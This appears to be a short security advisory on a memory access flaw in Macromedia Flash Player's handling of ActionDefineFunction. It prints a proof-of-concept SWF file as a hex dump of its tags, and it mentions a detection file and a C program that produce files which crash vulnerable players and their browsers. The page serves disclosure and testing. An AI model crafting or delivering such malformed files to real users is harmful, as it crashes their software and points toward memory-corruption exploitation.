|
|
Macromedia Flash ActionDefineFunction Memory Access Vulnerability
The following proof of concept is available: <swf> ----- [SetBackgroundColor] ----- TagID: 9 (size: 3 (short tag) - dump ->: \x43\x02\xff\x00\x00 ----- [DoAction] ----- TagID: 12 (size: 60 (short tag) - dump ->: \x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00 \x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43 \x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45 \x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00 ----- [ShowFrame] ----- TagID: 1 (size: 0 (short tag) - dump ->: \x40\x00 ----- [End] ----- TagID: 0 (size: 0 (short tag) - dump ->: \x00\x00 </swf> The following proof of concept (df.swf) provided by Karma <karma@DesignFolks.com.au> will determine if a vulnerable Flash Player is installed. If the Flash Player is vulnerable, opening the file will crash the browser. Otherwise a yellow image will be displayed. The 'flash_dos_poc.c' proof of concept exploit by BassReFLeX creates a SWF file sufficient to exploit this issue to crash a vulnerable Flash Player. |
|
Privacy Statement |